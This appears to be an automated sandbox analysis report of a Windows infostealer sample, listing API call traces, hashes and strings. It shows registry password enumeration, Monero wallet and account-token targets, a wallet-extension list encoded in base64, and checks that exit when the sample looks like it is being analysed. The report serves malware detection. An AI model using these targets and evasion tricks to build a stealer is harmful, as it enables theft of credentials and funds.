Opcode ID: 484930bce351f8cb11f9dadcc362142a501d67dcf8d61152e366eecb3a98209e
Instruction ID: dc22a4d24e3d8ca49e7b3c78e599ab756966429050db565c9ee216bc1397e7e6
Opcode Fuzzy Hash: 484930bce351f8cb11f9dadcc362142a501d67dcf8d61152e366eecb3a98209e
Instruction Fuzzy Hash: 6B51E1B29501195BCF15FB60DC96AED737CAF65300F8045A8B60A62091EF706B89CFE6

Function 00187610 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00187310: memset.MSVCRT ref: 00187354
Part of subcall function 00187310: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0018737A
Part of subcall function 00187310: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001873F1
Part of subcall function 00187310: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0018744D
Part of subcall function 00187310: GetProcessHeap.KERNEL32(00000000,?), ref: 00187492
Part of subcall function 00187310: HeapFree.KERNEL32(00000000), ref: 00187499

lstrcat.KERNEL32(35BFF020,001A17A0), ref: 00187646
lstrcat.KERNEL32(35BFF020,00000000), ref: 00187688
lstrcat.KERNEL32(35BFF020, : ), ref: 0018769A
lstrcat.KERNEL32(35BFF020,00000000), ref: 001876CF
lstrcat.KERNEL32(35BFF020,001A17A8), ref: 001876E0
lstrcat.KERNEL32(35BFF020,00000000), ref: 00187713
lstrcat.KERNEL32(35BFF020,001A17AC), ref: 0018772D
task.LIBCPMTD ref: 0018773B

Strings

: , xrefs: 0018768E

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: :
API String ID: 3191641157-3653984579
Opcode ID: 419b90dac8e658fadcb74891ad5ab2c10a420638e5c3599aa962c9c8cd2d5630
Instruction ID: 08263cc0c034f79f0dd37bd130419788f1bcbe6844b0bbb19344210476b59d3c
Opcode Fuzzy Hash: 419b90dac8e658fadcb74891ad5ab2c10a420638e5c3599aa962c9c8cd2d5630
Instruction Fuzzy Hash: 40313E76910109EFCB05EBE0DC9ADEF7779AB55701F648018F102A7290DB78AA46CFA0

Function 00187310 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00187354
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0018737A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001873F1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0018744D
GetProcessHeap.KERNEL32(00000000,?), ref: 00187492
HeapFree.KERNEL32(00000000), ref: 00187499
task.LIBCPMTD ref: 00187595

Strings

Password, xrefs: 00187441

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettask
String ID: Password
API String ID: 2808661185-3434357891
Opcode ID: 8e8b66c8911a60b742a7bd07208dbc73e6a3aaf65cc0d5950aff8707930f63b9
Instruction ID: 4c1b968ff086248a86915512832eda9a634539a6c16dff5f623450f12ed34102
Opcode Fuzzy Hash: 8e8b66c8911a60b742a7bd07208dbc73e6a3aaf65cc0d5950aff8707930f63b9
Instruction Fuzzy Hash: CB611FB59042589BDB24EF50CC45BD9B7B8BF58300F1081D9E649A6181DF709BC9CF90

Function 00196FA0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00196FE2
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0019701F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 001970A3
RtlAllocateHeap.NTDLL(00000000), ref: 001970AA
wsprintfA.USER32 ref: 001970E0

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

Strings

:, xrefs: 00196FFC
C, xrefs: 00196FEC
\, xrefs: 00197000

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 1544550907-3809124531
Opcode ID: 7b10962edc3f4c2e3143dd03e536680fbabcdc64730af641473eaa935df4ed56
Instruction ID: ba5cc04cde04d7a9f9e76ae00e7b8969f85f5e539bab53b3da9fa10b3d6f5469
Opcode Fuzzy Hash: 7b10962edc3f4c2e3143dd03e536680fbabcdc64730af641473eaa935df4ed56
Instruction Fuzzy Hash: 1441B1B1D04248EBDF14DF94DC45BEEBBB8BF19710F144498F509A7280D7746A48CBA5

Function 001860F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6

Part of subcall function 00184800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 0018483B
Part of subcall function 00184800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00184852
Part of subcall function 00184800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00184869
Part of subcall function 00184800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00184889
Part of subcall function 00184800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00184899

InternetOpenA.WININET(001A0DE2,00000001,00000000,00000000,00000000), ref: 0018615F
StrCmpCA.SHLWAPI(?,013AE450), ref: 00186197
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 001861DF
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00186203
InternetReadFile.WININET(?,?,00000400,?), ref: 0018622C
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0018625A
CloseHandle.KERNEL32(?,?,00000400), ref: 00186299
InternetCloseHandle.WININET(?), ref: 001862A3
InternetCloseHandle.WININET(00000000), ref: 001862B0

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: c5f66bfc521b9d8d06a9cfdd111936c37a879e8b96f69acd0390331d80d38db7
Instruction ID: 5f17ab305caf7f294a3088a11efd0e753b9abd0ffdb3f5d3f089f12ce91bb860
Opcode Fuzzy Hash: c5f66bfc521b9d8d06a9cfdd111936c37a879e8b96f69acd0390331d80d38db7
Instruction Fuzzy Hash: 6F516CB1A10208AFDF24EFA0CC49BEE7779AF44301F508098B605A71C1DBB46B89CF95

Function 00196490 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00199270: GetProcAddress.KERNEL32(75900000,013A0588), ref: 001992B1
Part of subcall function 00199270: GetProcAddress.KERNEL32(75900000,013A05A0), ref: 001992CA
Part of subcall function 00199270: GetProcAddress.KERNEL32(75900000,013A05B8), ref: 001992E2
Part of subcall function 00199270: GetProcAddress.KERNEL32(75900000,013A05D0), ref: 001992FA
Part of subcall function 00199270: GetProcAddress.KERNEL32(75900000,013A05E8), ref: 00199313
Part of subcall function 00199270: GetProcAddress.KERNEL32(75900000,013A8B50), ref: 0019932B
Part of subcall function 00199270: GetProcAddress.KERNEL32(75900000,01396360), ref: 00199343
Part of subcall function 00199270: GetProcAddress.KERNEL32(75900000,013964E0), ref: 0019935C
Part of subcall function 00199270: GetProcAddress.KERNEL32(75900000,013A0600), ref: 00199374
Part of subcall function 00199270: GetProcAddress.KERNEL32(75900000,013A0630), ref: 0019938C
Part of subcall function 00199270: GetProcAddress.KERNEL32(75900000,013A0648), ref: 001993A5
Part of subcall function 00199270: GetProcAddress.KERNEL32(75900000,013A0690), ref: 001993BD
Part of subcall function 00199270: GetProcAddress.KERNEL32(75900000,01396640), ref: 001993D5
Part of subcall function 00199270: GetProcAddress.KERNEL32(75900000,013A0660), ref: 001993EE

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

Part of subcall function 001811D0: ExitProcess.KERNEL32 ref: 00181211

Part of subcall function 00181160: GetSystemInfo.KERNEL32(?), ref: 0018116A
Part of subcall function 00181160: ExitProcess.KERNEL32 ref: 0018117E

Part of subcall function 00181110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0018112B
Part of subcall function 00181110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00181132
Part of subcall function 00181110: ExitProcess.KERNEL32 ref: 00181143

Part of subcall function 00181220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0018123E
Part of subcall function 00181220: ExitProcess.KERNEL32 ref: 00181294

Part of subcall function 00196210: GetUserDefaultLangID.KERNEL32 ref: 00196214

Part of subcall function 00181190: ExitProcess.KERNEL32 ref: 001811C6

Part of subcall function 001972F0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001811B7), ref: 00197320
Part of subcall function 001972F0: RtlAllocateHeap.NTDLL(00000000), ref: 00197327
Part of subcall function 001972F0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0019733F

Part of subcall function 00197380: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001973B0
Part of subcall function 00197380: RtlAllocateHeap.NTDLL(00000000), ref: 001973B7
Part of subcall function 00197380: GetComputerNameA.KERNEL32(?,00000104), ref: 001973CF

Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2

Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5

OpenEventA.KERNEL32(rcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGphY3BrbWpta2NhZmNocHBibnBuaGRtb258MXwwfDB8RWx,00000000,00000000,00000000,?,013A8A60,?,001A10DC,?,00000000,?,001A10E0,?,00000000,001A0ADA), ref: 0019656A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00196588
CloseHandle.KERNEL32(00000000), ref: 00196599
Sleep.KERNEL32(00001770), ref: 001965A4
CloseHandle.KERNEL32(?,00000000,?,013A8A60,?,001A10DC,?,00000000,?,001A10E0,?,00000000,001A0ADA), ref: 001965BA
ExitProcess.KERNEL32 ref: 001965C2

Strings

rcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGphY3BrbWpta2NhZmNocHBibnBuaGRtb258MXwwfDB8RWx, xrefs: 00196565

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID: rcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGphY3BrbWpta2NhZmNocHBibnBuaGRtb258MXwwfDB8RWx
API String ID: 2931873225-2363891162
Opcode ID: 04c6308c6f1abd13918b803d0aad72ea87485e9e75e40f3593a1c3a758bf2479
Instruction ID: a6ac5858a10daf9ef75b063381abae8445808c3e2337fe42b5e35f506e4395be
Opcode Fuzzy Hash: 04c6308c6f1abd13918b803d0aad72ea87485e9e75e40f3593a1c3a758bf2479
Instruction Fuzzy Hash: C231F871910208AADF05FBF0DC56BAE777DAF65740F904528F512A6092DFB06A09CBA2

Function 0018B8E0 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2

Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352

Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5

Part of subcall function 00189E60: LocalAlloc.KERNEL32(00000040,?), ref: 00189EFE

lstrlen.KERNEL32(00000000), ref: 0018BADD

Part of subcall function 001988D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001988F2

StrStrA.SHLWAPI(00000000,AccountId), ref: 0018BB0B
lstrlen.KERNEL32(00000000), ref: 0018BBE3
lstrlen.KERNEL32(00000000), ref: 0018BBF7

Strings

SELECT service, encrypted_token FROM token_service, xrefs: 0018BA4B
AccountTokens, xrefs: 0018B9A9
AccountTokens, xrefs: 0018B91A
AccountId, xrefs: 0018BB02

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcpylstrlen$AllocLocallstrcat
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 3171688271-1079375795
Opcode ID: 6e5d73e00e985aae5b61261e1f0b2309b7e1dc74cd1599d52462dec19b88ae56
Instruction ID: 930699cc9dd3ad854b29da25107b7ded0c80acaa1b20fef582cb12025a456342
Opcode Fuzzy Hash: 6e5d73e00e985aae5b61261e1f0b2309b7e1dc74cd1599d52462dec19b88ae56
Instruction Fuzzy Hash: 6AA1EA72910108AACF15FBA4DC96EEE7778BF65300F844569F506620A1EF746B4CCBE2

Function 00197BA0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,013ADBC8,00000000,?,001A0DFC,00000000,?,00000000), ref: 00197BD0
RtlAllocateHeap.NTDLL(00000000), ref: 00197BD7
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00197BF8
wsprintfA.USER32 ref: 00197C4C

Strings

%d MB, xrefs: 00197C43
@, xrefs: 00197BED

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
